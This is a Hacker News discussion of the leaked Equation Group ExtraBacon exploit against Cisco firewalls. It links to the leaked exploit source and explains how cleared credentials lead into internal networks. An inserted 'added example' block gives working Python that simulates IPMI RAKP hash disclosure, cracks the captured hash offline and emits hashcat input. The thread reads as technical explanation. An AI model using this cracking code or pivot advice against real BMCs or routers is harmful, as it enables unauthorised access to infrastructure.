
EquationGroup Tool Leak – ExtraBacon Demo - ianhawes
https://xorcatt.wordpress.com/2016/08/16/equationgroup-tool-leak-extrabacon-demo/
======
djsumdog
Someone at Kiwicon (2015, I think?) went through breaking into a Cisco router.
Newer Cisco hardware actually runs a Linux kernel and one massive (I think it
was like 50MB) binary. There's only one ethernet device too, because the others
are controlled by user-space PCI devices within that binary.

From what I could tell, it looked like Cisco used to have a fully independent OS
(IOS) and when they switched to Intel hardware, it was easier for them to just
build a shim layer between Linux and their OS so they could run on
cheaper/newer hardware without a massive rewrite.

Anyway, that guy responsibly disclosed and his exploit was patched, but it did
give full access to everything, including the ability to create new routes and
filters that wouldn't even be visible from within IOS.

------
nneonneo
Source code from the leak, if anyone's curious:
[https://github.com/nneonneo/eqgrp-free-file/tree/master/Firewall/EXPLOITS/EXBA](https://github.com/nneonneo/eqgrp-free-file/tree/master/Firewall/EXPLOITS/EXBA)

------
mrb
Ha! Someone sent 1.5 BTC (~800 USD) to the hacker's address
19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK to bid on eqgrp_auction_file.tar.xz.asc. He
sent it from a vanity bitcoin address starting with "1nice" ;-)
[https://blockchain.info/tx/c44b40b6d845d9cc256e21606821569db...](https://blockchain.info/tx/c44b40b6d845d9cc256e21606821569dbe7232ffeab4cd7c65b037ca7e38abd1)

~~~
abrkn
It embeds a Bitmessage[1] address using the OP_RETURN[2] opcode, as
EquationGroup requested:

    BM-2cXe6wAT7yTgoxGCpDMmdWq2xxWcdmL3Ek

[1] [https://bitmessage.org/wiki/Main_Page](https://bitmessage.org/wiki/Main_Page)
[2] [https://en.bitcoin.it/wiki/OP_RETURN](https://en.bitcoin.it/wiki/OP_RETURN)
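
How an OP_RETURN output carries a payload like the address above, as an added example in Python (not code from the thread, from the poster, or from any Bitcoin project). The script bytes are built here from the address quoted in the comment and are a constructed stand-in, not the real scriptPubKey of the linked transaction; the decoder handles the direct-push, OP_PUSHDATA1 and OP_PUSHDATA2 encodings and rejects truncated pushes, and the address is picked out of the payload with the standard base58 alphabet that Bitmessage addresses use.

```python
"""Build and decode OP_RETURN data-carrier outputs (added example)."""
import re
from typing import Optional

OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
OP_PUSHDATA2 = 0x4D
DEFAULT_RELAY_LIMIT = 80  # bytes of OP_RETURN data most nodes relay by default

# Constructed sample payload: the address quoted in the thread.
SAMPLE_ADDRESS = b"BM-2cXe6wAT7yTgoxGCpDMmdWq2xxWcdmL3Ek"

# Base58 alphabet (no 0, O, I, l) shared by Bitcoin and Bitmessage addresses.
BITMESSAGE_RE = re.compile(rb"BM-[1-9A-HJ-NP-Za-km-z]{20,}")


def build_op_return_script(payload: bytes) -> bytes:
    """Return a scriptPubKey that is provably unspendable and carries `payload`.

    Push lengths up to 75 use the one-byte direct push; longer pushes need
    OP_PUSHDATA1 (1-byte length) or OP_PUSHDATA2 (2-byte little-endian length).
    """
    n = len(payload)
    if n <= 75:
        push = bytes([n])
    elif n <= 0xFF:
        push = bytes([OP_PUSHDATA1, n])
    elif n <= 0xFFFF:
        push = bytes([OP_PUSHDATA2]) + n.to_bytes(2, "little")
    else:
        raise ValueError("payload too large for a single push")
    return bytes([OP_RETURN]) + push + payload


def decode_op_return(script: bytes) -> Optional[bytes]:
    """Return the data pushed after OP_RETURN, or None if `script` is not a
    well-formed data-carrier output (wrong leading opcode, non-push opcode,
    or a push whose declared length runs past the end of the script)."""
    if not script or script[0] != OP_RETURN:
        return None
    i, data = 1, b""
    while i < len(script):
        op = script[i]
        i += 1
        if 1 <= op <= 75:
            n = op
        elif op == OP_PUSHDATA1:
            if i + 1 > len(script):
                return None
            n = script[i]
            i += 1
        elif op == OP_PUSHDATA2:
            if i + 2 > len(script):
                return None
            n = int.from_bytes(script[i:i + 2], "little")
            i += 2
        else:
            return None  # anything other than a push is not a data carrier
        chunk = script[i:i + n]
        if len(chunk) != n:
            return None  # truncated push
        data += chunk
        i += n
    return data


def exceeds_relay_limit(data: bytes) -> bool:
    """True when default node policy would refuse to relay this payload."""
    return len(data) > DEFAULT_RELAY_LIMIT


def find_bitmessage_address(data: bytes) -> Optional[str]:
    """Pull a BM- address out of an arbitrary OP_RETURN payload, if present."""
    m = BITMESSAGE_RE.search(data)
    return m.group(0).decode("ascii") if m else None


if __name__ == "__main__":
    script = build_op_return_script(SAMPLE_ADDRESS)
    print(script.hex())
    print(find_bitmessage_address(decode_op_return(script)))
```

The decoder deliberately concatenates every push after OP_RETURN rather than stopping at the first one, since nothing in the script language forbids several, and it returns None instead of a partial payload on a truncated push so that a caller never treats a damaged script as carrying a shorter message.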

~~~
ryan-c
This one[0] has cryptome's GPG fingerprint.

The same person seems to have sent several others, including one listing
cryptome's email address and several rude[1] and vulgar[2] messages. Charming.

0.
[https://blockchain.info/tx/8974f9ba743f073bfe18a2f1505ad9934...](https://blockchain.info/tx/8974f9ba743f073bfe18a2f1505ad993401a0f8ea02406c8633741be61b07a26)

1.
[https://blockchain.info/tx/8e1e3cda1caf23e2f3071595efdbc794b...](https://blockchain.info/tx/8e1e3cda1caf23e2f3071595efdbc794b9775c8cbd750cdac14494f01d12eaf1)

2.
[https://blockchain.info/tx/527202542acc7d87a763bafa5fc66a0a9...](https://blockchain.info/tx/527202542acc7d87a763bafa5fc66a0a96e4cf5c338d7701a552124c9a776fae)

------
searine
[https://en.wikipedia.org/wiki/Equation_Group](https://en.wikipedia.org/wiki/Equation_Group)

FYI

------
shishiwakamaru
without the enable password, you can't do much

~~~
Zombieball
Could you elaborate to those of us not familiar with Cisco routers?

My understanding is this exploit disables password authentication and allows
you to access the device. A separate command allows you to re-enable it.

Would this re-enabling kill your current connection? Is the password later
needed to change settings on the router (like if you typed sudo and are forced
to re-authenticate)?

~~~
a2tech
On a Cisco router you log in via SSH or Telnet, then you run a command to
become 'enabled'. enable is a command like sudo on Linux: it elevates your
permission level so you can make changes (although not all changes require you
to be enabled, most do).

If you used ExtraBacon to clear the login user/password you would get a basic
shell on connection. This would open at least 2 options to you as an
attacker: 1) using a local exploit to become an enabled user and 2) you can now
send traffic to ALL the networks that the firewall/router knows about, for
example, a non-internet-connected management network that might be filled with
never-upgraded KVM/OOB control equipment.

~~~
Zombieball
Thanks! #2 definitely seems like a big issue. I can imagine many "internal"
services that are potentially insecure.

~~~
Vendan
My fav is IPMI. Many devices allow you to log in using cipher 0... basically,
if you know the username, you get access. The rest... well, IPMI has a hash
disclosure built into the protocol. If you can guess a username, you can get
(and try to crack) the password.
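
The hash disclosure Vendan refers to is in the IPMI 2.0 RAKP handshake: the BMC answers RAKP Message 1 with an HMAC-SHA1 keyed on the user's password before the client has proven anything, and every other input to that HMAC is on the wire. The following is an added example in Python, not code from the thread or from any BMC vendor or cracking tool; it plays both sides of the exchange with constructed session IDs, nonces, GUID and user database (all assumptions), then runs the offline dictionary attack an attacker on that management network would run. The only protocol fact it relies on is the RAKP Message 2 authentication code definition, HMAC_KUID(SIDm || SIDc || Rm || Rc || GUIDc || ROLEm || ULENm || UNAMEm).

```python
"""IPMI 2.0 RAKP Message 2 hash disclosure, simulated end to end (added example)."""
import hashlib
import hmac
from typing import Dict, List, Optional

# Constructed BMC user database (username -> password).  A real BMC stores
# the password as a 16- or 20-byte NUL-padded field; HMAC zero-pads short
# keys to the block size anyway, so "admin" and "admin\0\0..." give the same code.
USER_DB: Dict[bytes, bytes] = {b"admin": b"admin", b"root": b"S3cret-Pass"}

GUID_C = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed BMC GUID
ROLE_ADMIN_LOOKUP = 0x14  # privilege level 4 (ADMINISTRATOR), name-only lookup bit set


def rakp2_auth_code(password: bytes, sid_m: bytes, sid_c: bytes, rand_m: bytes,
                    rand_c: bytes, guid_c: bytes, role_m: int, uname: bytes) -> bytes:
    """Key-exchange authentication code the BMC places in RAKP Message 2."""
    msg = sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role_m, len(uname)]) + uname
    return hmac.new(password, msg, hashlib.sha1).digest()


def bmc_answer_rakp1(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
                     role_m: int, uname: bytes) -> Optional[dict]:
    """The managed system's side.  The ordering is the flaw: the BMC returns a
    MAC keyed with the user's password before the remote console has
    authenticated, so whoever can send RAKP1 for a valid username gets
    crackable material back."""
    password = USER_DB.get(uname)
    if password is None:
        return None  # a real BMC answers with an RMCP+ error status instead
    return {
        "sid_m": sid_m, "sid_c": sid_c, "rand_m": rand_m, "rand_c": rand_c,
        "guid_c": GUID_C, "role_m": role_m, "uname": uname,
        "auth_code": rakp2_auth_code(password, sid_m, sid_c, rand_m, rand_c,
                                     GUID_C, role_m, uname),
    }


def capture_exchange(uname: bytes) -> Optional[dict]:
    """Run one RAKP1/RAKP2 round with fixed (constructed) nonces so the
    captured material is reproducible.  Everything in the returned dict is
    visible to a network observer, or chosen by the attacker outright."""
    sid_m = bytes.fromhex("a4a3a2a0")           # remote console session ID (attacker picks)
    sid_c = bytes.fromhex("02000000")           # BMC session ID from Open Session Response
    rand_m = bytes(range(16))                   # attacker's nonce; needs no entropy for this
    rand_c = bytes.fromhex("f0e1d2c3b4a5968778695a4b3c2d1e0f")  # BMC nonce, sent in clear
    return bmc_answer_rakp1(sid_m, sid_c, rand_m, rand_c, ROLE_ADMIN_LOOKUP, uname)


def crack_rakp2(capture: dict, wordlist: List[bytes]) -> Optional[bytes]:
    """Offline dictionary attack over a captured RAKP2: recompute the MAC for
    each candidate password and compare with the one the BMC sent."""
    for candidate in wordlist:
        guess = rakp2_auth_code(candidate, capture["sid_m"], capture["sid_c"],
                                capture["rand_m"], capture["rand_c"], capture["guid_c"],
                                capture["role_m"], capture["uname"])
        if hmac.compare_digest(guess, capture["auth_code"]):
            return candidate
    return None


def cracker_line(capture: dict) -> str:
    """Same material as hex 'salt:hash', the layout offline crackers take for
    IPMI 2.0 RAKP HMAC-SHA1 (hashcat mode 7300)."""
    salt = (capture["sid_m"] + capture["sid_c"] + capture["rand_m"] + capture["rand_c"]
            + capture["guid_c"] + bytes([capture["role_m"], len(capture["uname"])])
            + capture["uname"])
    return f"{salt.hex()}:{capture['auth_code'].hex()}"


if __name__ == "__main__":
    cap = capture_exchange(b"admin")
    print(cracker_line(cap))
    print(crack_rakp2(cap, [b"password", b"changeme", b"admin"]))
```

Note what the attacker never needs: a valid password, a downgraded cipher suite, or a man-in-the-middle position. One unauthenticated RAKP1 per candidate username is enough, which is why the fix on the operator side is network isolation of the BMC interfaces and long, unique passwords, not a protocol setting.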

------
meeper16
"ExtraBaconDemo" Ok, this is going to be hilarious.

------
waterside81
So I downloaded the files and poked around the Python code. The code looked
positively amateurish, not in its functionality (I'm sure it works) but in the
coding style. I'm not sure what I expected, but the formatting, the types of
comments, it all looked like it was written by someone who just started out
with Python. Maybe it was written very hastily, I don't know, but I encourage
others to take a look. It's interesting to see the source for this kind of
stuff.

~~~
DavidWanjiru
I'm curious if this has to do with their generally broken English, as I read
on what I think was their blog post. Does English proficiency affect coding
"fluency", seeing as you are coding in English?

~~~
Udik
I don't think that the English of that message is real. Looks made up, maybe
to give a better aura of mystery and possibly to avoid the risk of being
recognised by some writing style analysis software.

